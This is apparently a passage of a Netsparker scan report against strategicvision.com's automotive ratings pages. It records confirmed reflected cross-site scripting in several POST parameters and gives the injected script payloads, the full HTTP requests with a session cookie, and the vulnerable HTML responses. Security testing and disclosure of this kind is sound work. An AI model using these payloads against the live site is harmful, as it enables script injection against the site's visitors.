<div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x0008D1)</script>" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x0008D2)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008D2)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:41:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x0008D2)</script>" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000909)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000909)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:42:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000909)</script>" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /view_ratings.php

/view_ratings.php CONFIRMED

http://www.strategicvision.com/view_ratings.php

Parameters

Parameter Type Value
referrer POST '"--></style></script><script>alert(0x00090A)</script>
v_yr1 POST 3
v_mk1 POST 3
v_mo1 POST 3
v_yr2 POST 3
v_mk2 POST 3
v_mo2 POST 3
v_yr3 POST 3
v_mk3 POST 3
v_mo3 POST 3
v_yr4 POST 3
v_mk4 POST 3
v_mo4 POST 3
v_yr5 POST 3
v_mk5 POST 3
v_mo5 POST 3

Request

POST /view_ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 214
Expect: 100-continue
Accept-Encoding: gzip, deflate

referrer='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00090A)%3c%2fscript%3e&v_yr1=3&v_mk1=3&v_mo1=3&v_yr2=3&v_mk2=3&v_mo2=3&v_yr3=3&v_mk3=3&v_mo3=3&v_yr4=3&v_mk4=3&v_mo4=3&v_yr5=3&v_mk5=3&v_mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:42:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
